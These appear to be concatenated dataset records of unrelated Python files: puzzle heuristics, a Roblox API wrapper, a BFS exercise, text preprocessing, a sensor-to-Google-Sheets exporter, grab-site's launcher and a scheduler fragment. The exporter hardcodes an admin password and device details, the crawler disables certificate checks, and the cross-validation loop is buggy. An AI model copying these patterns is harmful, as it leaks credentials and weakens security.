0}\n\n\ndef hxy(start, goal, precalculated=False):\n\n result = 0\n nodes = 0\n\n for dimension in ['row', 'col']:\n start_xy = XYState(start, dimension=dimension)\n goal_xy = XYState(goal, dimension=dimension)\n\n if precalculated:\n if start.side_length != 3:\n raise NotImplementedError('Precalculated X-Y heuristic is only implemented for the 8-puzzle')\n result += xy_db[str(num_list_to_int(start_xy.sequence)) + '_' + str(num_list_to_int(goal_xy.sequence))]\n else:\n dimension_result = astar(start_xy, goal_xy, heuristic=h_xy_manhattan)\n result += len(dimension_result['solution'])-1\n nodes += dimension_result['total_nodes']\n\n return {'value': result, 'nodes': nodes}\n\n\ndef hxy_precalculated(start, goal):\n if not xy_db:\n import_xy_db()\n return hxy(start, goal, precalculated=True)\n\n\ndef row_strips_to_str(strips):\n return ''.join([str(val) for val in chain(strips)])\n\n\ndef get_state_set_key(state_a, state_b):\n return row_strips_to_str(state_a) + '_' + row_strips_to_str(state_b)\n\n\ndef get_all_xy_start_states():\n full_tile_set = set(range(1, 10))\n states = []\n for strip_a in combinations(full_tile_set, 3):\n remaining_tiles = full_tile_set-set(strip_a)\n for strip_b in combinations(remaining_tiles, 3):\n remaining_tiles = full_tile_set - set(strip_a) - set(strip_b)\n for strip_c in combinations(remaining_tiles, 3):\n strips = strips_to_sequence([strip_a, strip_b, strip_c])\n states.append(strips)\n return states\n\n\ndef generate_hxy_db(filename):\n\n states = get_all_xy_start_states()\n xy_db = {}\n\n for start_index, start in enumerate(states):\n\n start = XYState(start)\n frontier = [start]\n explored = set()\n\n while frontier:\n node = frontier.pop(0)\n explored.add(node)\n\n xy_db[str(start.sequence) + '_' + str(node.sequence)] = node.path_cost\n\n children = node.get_children()\n for child in children:\n child.path_cost = node.path_cost+1\n if child not in frontier and child not in explored:\n frontier.append(child)\n\n print('\\r' + str(start_index) + ' states processed. ' +\n str(len(xy_db.keys())) + ' entries in database.',\n end='', flush=True)\n\n with open(filename, 'wb') as file:\n pickle.dump(xy_db, file)\n\ndef hxy_new(start,goal):\n\n def get_strips(node,dimension):\n strips = None\n if dimension=='row':\n strips = node.get_rows()\n elif dimension=='col':\n strips = node.get_cols()\n strips = [set(strip) for strip in strips]\n return strips\n\n def get_strip_num(strips,value):\n for strip_num,strip in enumerate(strips):\n if value in strip:\n return strip_num\n\n def first_unmatching_strip(start,goal):\n for strip_num,strip_pair in enumerate(zip(start,goal)):\n if strip_pair[0] != strip_pair[1]:\n return strip_num\n\n def swap_in_strips(strips, a, b):\n for strip in strips:\n if a in strip:\n strip.remove(a)\n strip.add(b)\n continue\n if b in strip:\n strip.remove(b)\n strip.add(a)\n\n def x_y_score_for_strips(start,goal,empty):\n score = 0\n while start != goal:\n empty_strip = get_strip_num(start,empty)\n if start[empty_strip] == goal[empty_strip]:\n target_strip_for_swap = first_unmatching_strip(start,goal)\n target_num_for_swap = (start[target_strip_for_swap]-goal[target_strip_for_swap]).pop()\n else:\n target_num_for_swap = (goal[empty_strip]-start[empty_strip]).pop()\n swap_in_strips(start, target_num_for_swap, empty)\n score += 1\n return score\n\n # CURRENTLY ALLOWS SWAPPING BETWEEN NON-ADJACENT STRIPS--NEED TO FIX THIS\n score = 0\n for dimension in ['row','col']:\n start_strips = get_strips(start,dimension)\n goal_strips = get_strips(goal,dimension)\n score += x_y_score_for_strips(start_strips,goal_strips,start.empty)\n\n return {'value': score, 'nodes':0}","sub_path":"hxy.py","file_name":"hxy.py","file_ext":"py","file_size_in_byte":7292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"341041538","text":"\"\"\"\r\nCopyright (c) 2017 James Patrick Dill, reshanie\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy\r\nof this software and associated documentation files (the \"Software\"), to deal\r\nin the Software without restriction, including without limitation the rights\r\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\r\ncopies of the Software, and to permit persons to whom the Software is\r\nfurnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all\r\ncopies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\r\nSOFTWARE.\r\n\"\"\"\r\n\r\nimport datetime\r\nimport logging\r\nfrom collections import namedtuple\r\nfrom json import JSONDecodeError\r\n\r\nimport faste\r\n\r\nfrom . import utils, enums, errors\r\n\r\nlog = logging.getLogger(\"roblox\")\r\n\r\n\r\nclass Asset(object):\r\n \"\"\"Roblox Asset object.\r\n\r\n Use :meth:`RobloxSession.get_asset` to get a specific asset.\r\n\r\n Attributes\r\n ----------\r\n name : str\r\n Asset name\r\n description : str\r\n Asset description\r\n id : int\r\n Asset ID\r\n product_id : Optional[int]\r\n Product ID\r\n asset_type : :class:`roblox.AssetType`\r\n Asset type\r\n created : :class:`datetime.datetime`\r\n When the asset was first created\r\n updated : :class:`datetime.datetime`\r\n When the asset was last updated\r\n price : Optional[int]\r\n Price of the asset in ROBUX\r\n sales : Optional[int]\r\n Total sales of the asset\r\n is_new : bool\r\n Whether Roblox considers the asset 'new'\r\n for_sale : bool\r\n Whether asset can be taken/bought\r\n public_domain : bool\r\n If the asset is public domain / publicly viewable\r\n limited : bool\r\n If the asset is limited\r\n limited_unique : bool\r\n If the asset is limited and unique\r\n remaining : Optional[int]\r\n How many are remaining, if the asset is limited\r\n membership_level: :class:`roblox.Membership`\r\n Minimum Builders Club needed to take the asset\r\n \"\"\"\r\n\r\n def __init__(self, client, asset_id=0):\r\n \"\"\"param client: client\r\n :type client: roblox.RobloxSession\r\n \"\"\"\r\n\r\n self.client = client\r\n\r\n self.id = asset_id\r\n\r\n self._update_info()\r\n\r\n def _update_info(self):\r\n try:\r\n product_info = self.client.http.product_info(self.id)\r\n except JSONDecodeError:\r\n raise errors.BadRequest(\"Invalid asset, possibly deleted\")\r\n\r\n self.product_id = product_info.get(\"ProductId\")\r\n self.name = product_info.get(\"Name\")\r\n self.description = product_info.get(\"Description\")\r\n\r\n self.asset_type = enums.AssetType(product_info.get(\"AssetTypeId\"))\r\n self.icon_image_asset_id = product_info.get(\"IconImageAssetId\")\r\n\r\n self.created = utils.get_datetime(product_info.get(\"Created\"))\r\n self.updated = utils.get_datetime(product_info.get(\"Updated\"))\r\n\r\n self.price = product_info.get(\"PriceInRobux\")\r\n self.sales = product_info.get(\"Sales\")\r\n self.is_new = product_info.get(\"IsNew\")\r\n self.for_sale = product_info.get(\"IsForSale\")\r\n self.public_domain = product_info.get(\"IsPublicDomain\")\r\n\r\n self.unique = product_info.get(\"IsLimitedUnique\")\r\n self.limited = product_info.get(\"IsLimited\") or self.unique\r\n self.remaining = product_info.get(\"Remaining\")\r\n\r\n self.membership_level = enums.Membership(product_info.get(\"MinimumMembershipLevel\"))\r\n\r\n self.creator_id = product_info[\"Creator\"][\"CreatorTargetId\"]\r\n self.creator_type = product_info[\"Creator\"][\"CreatorType\"]\r\n\r\n def __hash__(self):\r\n return self.id\r\n\r\n def __repr__(self):\r\n return \"\".format(self)\r\n\r\n def __str__(self):\r\n return self.name\r\n\r\n def __eq__(self, other):\r\n \"\"\"\r\n Returns True if two asset objects are the same asset.\r\n \"\"\"\r\n if type(other) != Asset:\r\n return False\r\n return self.id == other.id\r\n\r\n @property\r\n @faste.decor.rr_cache()\r\n def creator(self):\r\n \"\"\"Asset creator\r\n\r\n :returns: :class:`User` or :class:`Group`\"\"\"\r\n if self.creator_type == \"User\":\r\n return self.client.get_user(user_id=self.creator_id)\r\n else:\r\n return self.client.get_group(self.creator_id)\r\n\r\n def buy(self):\r\n \"\"\"\r\n Takes/buys asset.\r\n\r\n :returns: `True` if successful\r\n \"\"\"\r\n return self.client.http.buy_product(self.product_id,\r\n self.price,\r\n self.creator_id)\r\n\r\n def remove_from_inventory(self):\r\n \"\"\"\r\n Deletes asset from inventory of client user.\r\n\r\n :returns: `True` if successful\r\n \"\"\"\r\n return self.client.http.delete_from_inventory(self.id)\r\n\r\n def post_comment(self, content):\r\n \"\"\"\r\n Posts comment on asset\r\n\r\n :param str content: Comment text\r\n\r\n :return: :class:`Comment`\r\n \"\"\"\r\n if not content:\r\n raise errors.BadRequest(\"Comment must have text.\")\r\n comment = self.client.http.post_comment(self.id, content)\r\n\r\n return Comment(self, content=comment[\"Text\"], created=comment[\"PostedDate\"], author=self.client.me)\r\n\r\n def owned_by(self, user):\r\n \"\"\"\r\n Checks if asset is owned by user.\r\n\r\n :param user: User\r\n :type user: :class:`User`\r\n :returns: `True` if user owns asset\r\n \"\"\"\r\n return self.client.http.user_owns_asset(user.id, self.id)\r\n\r\n @property\r\n @faste.decor.rr_cache()\r\n def icon(self):\r\n \"\"\"Asset for icon\r\n\r\n :returns: Optional[:class:`Asset`]\"\"\"\r\n if self.icon_image_asset_id == 0:\r\n return None\r\n\r\n return self.client.get_asset(self.icon_image_asset_id)\r\n\r\n @property\r\n def favorites(self):\r\n \"\"\"Favorite count of asset\r\n\r\n :returns: int\"\"\"\r\n return self.client.http.asset_favorites(self.id)\r\n\r\n def is_favorited(self):\r\n \"\"\"Whether asset is favorited by client\r\n\r\n :returns: bool\"\"\"\r\n return self.client.http.is_favorited(self.id)\r\n\r\n def favorite(self):\r\n \"\"\"Favorites asset if it isn't favorited already.\r\n\r\n :returns: return value of :meth:`is_favorited` (bool)\"\"\"\r\n if self.is_favorited():\r\n return True\r\n\r\n return self.client.http.toggle_favorite(self.id)\r\n\r\n def unfavorite(self):\r\n \"\"\"Unfavorites asset if it's favorited.\r\n\r\n :returns: return value of :meth:`is_favorited` (bool)\"\"\"\r\n if not self.is_favorited():\r\n return False\r\n\r\n return not self.client.http.toggle_favorite(self.id)\r\n\r\n def recent_average_price(self):\r\n \"\"\"Gets RAP of asset, if it is a collectible.\r\n\r\n :returns: Optional[`int`]\"\"\"\r\n return self.client.http.get_sales_data(self.id).get(\"AveragePrice\")\r\n\r\n def RAP(self):\r\n \"\"\"Alias for :meth:recent_average_pice\"\"\"\r\n return self.recent_average_price()\r\n\r\n def sales_chart(self):\r\n \"\"\"Gets :class:`SalesChart` for asset, if it's a collectible.\"\"\"\r\n\r\n return SalesChart(self.client, self)\r\n\r\n\r\nclass Game(Asset):\r\n pass\r\n\r\n\r\nsales_point = namedtuple(\"sales_day\", \"date price volume\")\r\n\r\n\r\nclass SalesChart(object):\r\n \"\"\"Asset sales chart, representing user sales of a collectible.\r\n\r\n You can also iterate over this object, and index it. ``SalesChart[0]`` will return the first sales point.\r\n You can also use ::\r\n >>> list(chart)\r\n >>> reversed(chart)\r\n >>> dict(chart)\r\n >>> len(chart)\r\n >>> datetime.date in chart\r\n\r\n The dict version and list versions' values are namedtuples representing sales points, with ``sales_point.date``\r\n , ``sales_point.price`` , and ``sales_point.volume``\r\n\r\n The dict's keys are :class:`datetime.date`\r\n\r\n Attributes\r\n ----------\r\n asset : :class:`Asset`\r\n Asset the sales chart belongs to\r\n chart_dict : dict\r\n dict version of the sales chart\r\n \"\"\"\r\n\r\n def __init__(self, client, asset):\r\n self.client = client\r\n self.asset = asset\r\n\r\n self.chart_dict = self._chart_dict()\r\n\r\n def _chart_dict(self):\r\n sales_data = self.client.http.get_sales_data(self.asset.id)\r\n if not sales_data:\r\n raise ValueError(\"{!r} isn't a collectible and has no sales data\".format(self.asset))\r\n\r\n sales_chart = sales_data.get(\"HundredEightyDaySalesChart\").split(\"|\")\r\n volume_chart = sales_data.get(\"HundredEightyDayVolumeChart\").split(\"|\")\r\n\r\n sales_chart_dict = {}\r\n for sale in sales_chart:\r\n ts = sale.split(\",\")\r\n if not ts[0]:\r\n break\r\n\r\n k = int(ts[0][:-3])\r\n sales_chart_dict[k] = int(ts[1])\r\n\r\n volume_chart_dict = {}\r\n for vol in volume_chart:\r\n tv = vol.split(\",\")\r\n if not tv[0]:\r\n break\r\n\r\n k = int(tv[0][:-3])\r\n volume_chart_dict[k] = int(tv[1])\r\n\r\n rtd = {}\r\n for timestamp in sales_chart_dict:\r\n nts = datetime.date.fromtimestamp(timestamp)\r\n\r\n rtd[nts] = sales_point(\r\n date=nts,\r\n price=sales_chart_dict.get(timestamp),\r\n volume=volume_chart_dict.get(timestamp) or 0,\r\n )\r\n\r\n return rtd\r\n\r\n def __dict__(self):\r\n return self.chart_dict\r\n\r\n def __iter__(self):\r\n return list(self.chart_dict.values())\r\n\r\n def __getitem__(self, index):\r\n return list(self.chart_dict.values())[index]\r\n\r\n def __len__(self):\r\n return len(self.chart_dict)\r\n\r\n def __reversed__(self):\r\n return reversed(list(self.chart_dict.values()))\r\n\r\n def __contains__(self, item):\r\n if isinstance(item, datetime.date):\r\n return item in self.chart_dict.keys()\r\n elif isinstance(item, sales_point):\r\n return item in self.chart_dict.values()\r\n return False\r\n\r\n def __repr__(self):\r\n return \"\".format(self)\r\n\r\n\r\nclass Comment(object):\r\n \"\"\"Asset comment.\r\n\r\n Attributes\r\n ----------\r\n asset : :class:`Asset`\r\n Asset the comment belongs to\r\n content : str\r\n Comment content\r\n created : :class:`datetime.datetime`\r\n When the comment was posted\"\"\"\r\n\r\n __slots__ = [\"asset\", \"content\", \"created\", \"_user\", \"_user_cache\"]\r\n\r\n def __init__(self, asset, content=None, created=None, author=None):\r\n \"\"\"\r\n :type asset: :class:`Asset`\r\n \"\"\"\r\n self.asset = asset\r\n\r\n self.content = content\r\n self.created = utils.get_datetime(created) if created else None\r\n\r\n self._user = author\r\n self._user_cache = None\r\n\r\n def __eq__(self, other):\r\n if not isinstance(other, type(self)):\r\n return False\r\n\r\n return self.asset == other.asset and self.created == other.created and self.author == other.author\r\n\r\n def __repr__(self):\r\n return \"\".format(self)\r\n\r\n def __str__(self):\r\n return self.content\r\n\r\n @property\r\n @faste.decor.rr_cache()\r\n def author(self):\r\n \"\"\"User who made the post.\r\n\r\n :returns: :class:`User`\"\"\"\r\n\r\n if type(self._user) == int:\r\n return self.asset.client.get_user(user_id=self._user)\r\n elif type(self._user) == str:\r\n return self.asset.client.get_user(username=self._user)\r\n\r\n return self._user\r\n\r\n","sub_path":"roblox/asset.py","file_name":"asset.py","file_ext":"py","file_size_in_byte":12222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"248419761","text":"from collections import deque\n\nm, n = map(int, input().split())\n\ndx = [0,0,1,-1]\ndy = [1,-1,0,0]\n\ndef bfs():\n cnt = 0\n while ripen_tomato:\n cnt += 1\n for _ in range(len(ripen_tomato)):\n y, x = ripen_tomato.popleft()\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0<=nx max_len else max_len\nmax_len = max([len(i) for i in val_text]) if max([len(i) for i in val_text]) > max_len else max_len\nprint(\"Maximum sentence length: \", max_len)\n\n#Sample if necessary.\nif args.sampling:\n\n #Generates a sample of 10% the dataset size.\n indices = np.random.choice(len(train_text), int(0.1 * len(train_text)))\n train_text = [train_text[index] for index in indices]\n train_label = [train_label[index] for index in indices]\n\n#Add padding to vocabulary\nreverse_dictionary['PAD'] = len(dictionary)\ndictionary[len(dictionary)] = 'PAD'\nwith open(args.emb_path, 'rb') as f:\n embeddings = pkl.load(f)\n embeddings = np.vstack((embeddings, np.zeros((1, embeddings.shape[1]))))\n\nwith open(os.path.join(args.data_path.split('/')[0], 'embeddings.pkl'), 'wb') as f:\n pkl.dump(embeddings, f) \n\ndef store(x, y, path, mode):\n \n #Since the vocabulary is indexed from 0, padding index is moved to length_of_vocabulary. \n x = pad_sequences(x, maxlen=max_len, dtype=\"int32\", padding='post', value=reverse_dictionary['PAD']) \n y = np.array(y).squeeze()\n\n\n with h5py.File(os.path.join(path, mode + '.h5'), 'w') as handle:\n handle.create_dataset('x', data=x)\n handle.create_dataset('y', data=y)\n\nif args.mode != 'cv':\n \n store(train_text, train_label, args.save_path, 'train')\n store(val_text, val_label, args.save_path, 'valid') \n \nelse:\n\n kf = KFold(n_splits=5)\n\n for fold, indices in enumerate(kf.split(train_text)):\n\n fold_path = os.path.join(args.save_path, 'fold{}'.format(fold))\n if not os.path.isdir(fold_path):\n os.makedirs(fold_path)\n \n train_text_fold, train_label_fold = [train_text[i] for i in indices[0]], [train_label[i] for i in indices[0]] \n val_text_fold, val_label_fold = [train_text[i] for i in indices[1]], [train_label[i] for i in indices[1]] \n \n store(train_text, train_label, fold_path, 'train')\n store(val_text, val_label, fold_path, 'valid') \n\nstore(test_text, test_label, args.save_path, 'test')\n","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"165535618","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Mar 29 12:27:28 2021\r\n\r\n@author: User\r\n\"\"\"\r\n\r\n\r\nfrom __future__ import print_function\r\n\r\nimport requests\r\n\r\nfrom requests.auth import HTTPBasicAuth\r\n\r\nimport datetime \r\nfrom datetime import datetime, timedelta\r\n\r\n\r\n\r\ntoday = datetime.today().strftime('%Y-%m-%dT%H:%M:%S.%f')[:-7] \r\n\r\n#N = 7\r\n\r\n#date_N_days_ago = datetime.today() - timedelta(days=N) \r\n#week_ago=date_N_days_ago.strftime('%Y-%m-%dT%H:%M:%S.%f')[:-7]\r\n\r\nheaders_oi = { 'Content-Type': 'application/json','MAC':'54:10:EC:B6:FD:60'}\r\n\r\n\r\n\r\nresponse_oi = requests.get('http://192.168.254.11/api/data/historical/zone/dwell/summary?element=Zone 0&format=json&from=2020-05-15T09:00:00&to={}&granularity=ONE_HOUR'.format(today), headers=headers_oi,auth=HTTPBasicAuth('Admin', 'dimin3421'))\r\n#try:\r\n # json_data = response.json()\r\n # print(json_data.content)\r\n\r\n#except ValueError:\r\n #print(\"Response content is not valid\r\n\r\nj_data_oi = response_oi.json()\r\n#print(response.content)\r\n\r\nresponse_oi2 = requests.get('http://192.168.254.11/api/data/historical/zone/inoutcount?element=Zone 0&format=json&from=2020-05-15T09:00:00&to={}&granularity=ONE_HOUR'.format(today), headers=headers_oi,auth=HTTPBasicAuth('Admin', 'dimin3421'))\r\n\r\nj_data_oi2 = response_oi2.json()\r\n\r\nin_number_oi=[]\r\nout_number_oi=[]\r\n\r\nfor results2 in j_data_oi2['content']['element'][0]['measurement']:\r\n in_number_oi.append(results2['value'][0]['value'])\r\nfor results3 in j_data_oi2['content']['element'][0]['measurement']:\r\n out_number_oi.append(results3['value'][1]['value'])\r\n \r\n \r\ntime_oi=[]\r\ncounts_oi=[]\r\n\r\nstat_oi=[]\r\nfor result in j_data_oi['content']['element'][0]['measurement']:\r\n time_oi.append(result['from'])\r\nfor results2 in j_data_oi['content']['element'][0]['measurement']:\r\n stat_oi.append(results2['value'][0]['value'])\r\nfor results in j_data_oi['content']['element'][0]['measurement']:\r\n counts_oi.append(results2['value'][1]['value'])\r\n import pandas as pd\r\ndata_oi = pd.DataFrame(time_oi, columns=['Time'])\r\ndata_oi['Counts All']= pd.DataFrame(in_number_oi)\r\n\r\ndata_oi['Counts']= pd.DataFrame(counts_oi)\r\ndata_oi['Stat']=pd.DataFrame(stat_oi)\r\ndata_oi=data_oi.fillna(0)\r\n\r\nfrom __future__ import print_function\r\nimport pickle\r\nimport os.path\r\nfrom googleapiclient.discovery import build\r\nfrom google_auth_oauthlib.flow import InstalledAppFlow\r\nfrom google.auth.transport.requests import Request\r\nimport requests\r\n\r\n#change this by your sheet ID\r\nSAMPLE_SPREADSHEET_ID_input = '1kUahG86CFtDXU8KH_-j6yoNlfQn9M2JKt-I4rnqGMtI'\r\n\r\n#change the range if needed\r\nSAMPLE_RANGE_NAME = 'A:D'\r\n\r\ndef Create_Service(client_secret_file, api_service_name, api_version, *scopes):\r\n global service\r\n SCOPES = [scope for scope in scopes[0]]\r\n #print(SCOPES)\r\n \r\n cred = None\r\n\r\n if os.path.exists('token_write.pickle'):\r\n with open('token_write.pickle', 'rb') as token:\r\n cred = pickle.load(token)\r\n\r\n if not cred or not cred.valid:\r\n if cred and cred.expired and cred.refresh_token:\r\n cred.refresh(Request())\r\n else:\r\n flow = InstalledAppFlow.from_client_secrets_file(client_secret_file, SCOPES)\r\n cred = flow.run_local_server()\r\n\r\n with open('token_write.pickle', 'wb') as token:\r\n pickle.dump(cred, token)\r\n\r\n try:\r\n service = build(api_service_name, api_version, credentials=cred)\r\n print(api_service_name, 'service created successfully')\r\n #return service\r\n except Exception as e:\r\n print(e)\r\n #return None\r\n \r\n# change 'my_json_file.json' by your downloaded JSON file.\r\nCreate_Service('credentials.json', 'sheets', 'v4',['https://www.googleapis.com/auth/spreadsheets'])\r\n \r\ndef Export_Data_To_Sheets():\r\n \r\n response_date = service.spreadsheets().values().update(\r\n spreadsheetId=SAMPLE_SPREADSHEET_ID_input,\r\n valueInputOption='RAW',\r\n range=SAMPLE_RANGE_NAME,\r\n body=dict(\r\n majorDimension='ROWS',\r\n values=data_oi.values.tolist())\r\n ).execute()\r\n print('Sheet successfully Updated')\r\n\r\nExport_Data_To_Sheets()","sub_path":"our_impact.py","file_name":"our_impact.py","file_ext":"py","file_size_in_byte":4142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"483229530","text":"import faulthandler\nfaulthandler.enable()\n\nimport re\nimport os\nimport sys\nimport binascii\nimport datetime\nimport click\nimport libgrabsite\n\ndef print_version(ctx, param, value):\n\tif not value or ctx.resilient_parsing:\n\t\treturn\n\tclick.echo(libgrabsite.__version__)\n\tctx.exit()\n\n\n@click.command()\n\n@click.option('--concurrency', default=2, metavar='NUM',\n\thelp='Use this many connections to fetch in parallel (default: 2).')\n\n@click.option('--concurrent', default=-1, metavar='NUM',\n\thelp='Alias for --concurrency.')\n\n@click.option('--delay', default=\"0\", metavar='DELAY',\n\thelp=\n\t\t'Time to wait between requests, in milliseconds (default: 0). '\n\t\t'Can be \"NUM\", or \"MIN-MAX\" to use a random delay between MIN and MAX '\n\t\t'for each request. Delay applies to each concurrent fetcher, not globally.')\n\n@click.option('--recursive/--1', default=True,\n\thelp=\n\t\t'--recursive (default: true) to crawl under last /path/ component '\n\t\t'recursively, or --1 to get just START_URL.')\n\n@click.option('--offsite-links/--no-offsite-links', default=False,\n\thelp=\n\t\t'--offsite-links (default: true) to grab all links to a depth of 1 '\n\t\t'on other domains, or --no-offsite-links to disable.')\n\n@click.option('--igsets', default=\"\", metavar='LIST',\n\thelp='Comma-separated list of ignore sets to use in addition to \"global\".')\n\n@click.option('--ignore-sets', default=\"\", metavar='LIST',\n\thelp='Alias for --igsets.')\n\n@click.option('--igon/--igoff', default=False,\n\thelp=\n\t\t'--igon (default: false) to print all URLs being ignored to the terminal '\n\t\t'and dashboard.')\n\n@click.option('--max-content-length', default=-1, metavar='N',\n\thelp=\n\t\t\"Skip the download of any response that claims a Content-Length \"\n\t\t\"larger than N (default: -1, don't skip anything).\")\n\n@click.option('--level', default=\"inf\", metavar='NUM',\n\thelp='Recurse this many levels (default: inf).')\n\n@click.option('--page-requisites-level', default=\"5\", metavar='NUM',\n\thelp='Recursive this many levels for page requisites (default: 5).')\n\n@click.option('--ua', default=\"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0\",\n\tmetavar='STRING', help='Send User-Agent: STRING instead of pretending to be Firefox on Windows.')\n\n@click.option('--sitemaps/--no-sitemaps', default=True,\n\thelp=\n\t\t'--sitemaps (default: true) to queue URLs from sitemap.xml '\n\t\t'at the root of the site, or --no-sitemaps to disable.')\n\n@click.option('--version', is_flag=True, callback=print_version,\n\texpose_value=False, is_eager=True, help='Print version and exit.')\n\n@click.argument('start_url')\n\ndef main(concurrency, concurrent, delay, recursive, offsite_links, igsets,\nignore_sets, igon, level, page_requisites_level, max_content_length, sitemaps,\nua, start_url):\n\tspan_hosts_allow = \"page-requisites,linked-pages\"\n\tif not offsite_links:\n\t\tspan_hosts_allow = \"page-requisites\"\n\n\tif concurrent != -1:\n\t\tconcurrency = concurrent\n\n\tif ignore_sets != \"\":\n\t\tigsets = ignore_sets\n\n\tid = binascii.hexlify(os.urandom(16)).decode('utf-8')\n\tymd = datetime.datetime.utcnow().isoformat()[:10]\n\tno_proto_no_trailing = start_url.split('://', 1)[1].rstrip('/')[:100]\n\twarc_name = \"{}-{}-{}\".format(re.sub('[^-_a-zA-Z0-9%\\.,;@+=]', '-', no_proto_no_trailing), ymd, id[:8])\n\n\t# make absolute because wpull will start in temp/\n\tworking_dir = os.path.abspath(warc_name)\n\tos.makedirs(working_dir)\n\ttemp_dir = os.path.join(working_dir, \"temp\")\n\tos.makedirs(temp_dir)\n\n\twith open(\"{}/id\".format(working_dir), \"w\") as f:\n\t\tf.write(id)\n\n\twith open(\"{}/start_url\".format(working_dir), \"w\") as f:\n\t\tf.write(start_url)\n\n\twith open(\"{}/concurrency\".format(working_dir), \"w\") as f:\n\t\tf.write(str(concurrency))\n\n\twith open(\"{}/max_content_length\".format(working_dir), \"w\") as f:\n\t\tf.write(str(max_content_length))\n\n\twith open(\"{}/igsets\".format(working_dir), \"w\") as f:\n\t\tf.write(\"global,{}\".format(igsets))\n\n\tif not igon:\n\t\twith open(\"{}/igoff\".format(working_dir), \"w\") as f:\n\t\t\tpass\n\n\twith open(\"{}/ignores\".format(working_dir), \"w\") as f:\n\t\tpass\n\n\twith open(\"{}/delay\".format(working_dir), \"w\") as f:\n\t\tf.write(delay)\n\n\tLIBGRABSITE = os.path.dirname(libgrabsite.__file__)\n\targs = [\n\t\t\"-U\", ua,\n\t\t\"--header=Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n\t\t\"--header=Accept-Language: en-US,en;q=0.5\",\n\t\t\"-o\", \"{}/wpull.log\".format(working_dir),\n\t\t\"--database\", \"{}/wpull.db\".format(working_dir),\n\t\t\"--plugin-script\", \"{}/plugin.py\".format(LIBGRABSITE),\n\t\t\"--python-script\", \"{}/wpull_hooks.py\".format(LIBGRABSITE),\n\t\t\"--save-cookies\", \"{}/cookies.txt\".format(working_dir),\n\t\t\"--no-check-certificate\",\n\t\t\"--delete-after\",\n\t\t\"--no-robots\",\n\t\t\"--page-requisites\",\n\t\t\"--no-parent\",\n\t\t\"--inet4-only\",\n\t\t\"--timeout\", \"20\",\n\t\t\"--tries\", \"3\",\n\t\t\"--concurrent\", str(concurrency),\n\t\t\"--waitretry\", \"5\",\n\t\t\"--warc-file\", \"{}/{}\".format(working_dir, warc_name),\n\t\t\"--warc-max-size\", \"5368709120\",\n\t\t\"--warc-cdx\",\n\t\t\"--debug-manhole\",\n\t\t\"--strip-session-id\",\n\t\t\"--escaped-fragment\",\n\t\t\"--monitor-disk\", \"400m\",\n\t\t\"--monitor-memory\", \"10k\",\n\t\t\"--max-redirect\", \"8\",\n\t\t\"--level\", level,\n\t\t\"--page-requisites-level\", page_requisites_level,\n\t\t\"--span-hosts-allow\", span_hosts_allow,\n\t\t\"--quiet\",\n\t]\n\n\tif sitemaps:\n\t\targs += [\"--sitemaps\"]\n\n\tif recursive:\n\t\targs += [\"--recursive\"]\n\n\targs += [start_url]\n\n\t# Mutate argv, environ, cwd before we turn into wpull\n\tsys.argv[1:] = args\n\tos.environ[\"GRAB_SITE_WORKING_DIR\"] = working_dir\n\t# We can use --warc-tempdir= to put WARC-related temporary files in a temp\n\t# directory, but wpull also creates non-WARC-related \"resp_cb\" temporary\n\t# files in the cwd, so we must start wpull in temp/ anyway.\n\tos.chdir(temp_dir)\n\n\tfrom wpull.app import Application\n\tdef noop_setup_signal_handlers(self):\n\t\tpass\n\n\t# Don't let wpull install a handler for SIGINT or SIGTERM,\n\t# because we install our own in wpull_hooks.py.\n\tApplication.setup_signal_handlers = noop_setup_signal_handlers\n\n\timport wpull.__main__\n\twpull.__main__.main()\n\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"libgrabsite/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"133367557","text":"'''Soubry schedulor version 0.0.0\r\n Features: \r\n 1. Runnable script from cmd.\r\n 2. Rewrite functions, make better reuse of code. \r\n 3. Normalization of input/output.\r\n'''\r\n# Core modules\r\nimport sys\r\nimport csv\r\nimport collections\r\nimport argparse\r\nimport warnings\r\nfrom datetime import timedelta, datetime\r\nfrom operator import add\r\nimport operator\r\n#import logging\r\nimport os\r\nimport math\r\nimport random\r\nimport itertools\r\nimport time\r\nimport msvcrt\r\nfrom population import Schedule\r\nfrom collections import OrderedDict\r\nfrom helperfunctions import JobInfo, read_down_durations, read_product_related_characteristics, read_precedence, read_price,\\\r\nread_breakdown_record\r\n\r\n# import pickle\r\n# duration_str = 'quantity' \r\n\r\n# 3rd-party modules\r\nimport numpy as np\r\nimport pandas as pd\r\nimport logging\r\n\r\nlogger = logging.getLogger(__name__)\r\nfrom sympy.printing.precedence import precedence\r\n\r\n# Global variables\r\n# POP_SIZE = 8 \r\n# CROSS_RATE = 0.6\r\n# MUTATION_RATE = 0.8\r\n# N_GENERATIONS = 200\r\n\r\nC1 = 10 # Used for failure cost calculation in run-down 